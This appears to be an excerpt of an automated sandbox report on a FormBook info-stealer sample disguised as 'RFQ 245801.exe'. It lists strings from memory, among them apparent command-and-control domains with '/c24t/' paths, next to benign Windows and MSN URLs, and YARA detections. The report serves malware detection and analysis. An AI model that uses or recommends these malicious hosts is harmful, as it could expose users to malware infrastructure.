          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/www.oko.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bondReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp, RFQ 245801.exe, 00000000.00000002.1752289178.0000000005400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sx9u.shop
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sx9u.shop/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sx9u.shop/c24t/www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sx9u.shopReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.info/c24t/www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venir-bienne.infoReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000006.00000002.4160246853.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000006.00000003.3116867213.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3113868661.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1736214563.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4145708361.000000000371D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000006.00000000.1749071753.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4159457016.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115691066.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3483071267.000000000C5E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: RFQ 245801.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 00000006.00000002.4161721752.00000000116FF000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4145408903.0000000003ADF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
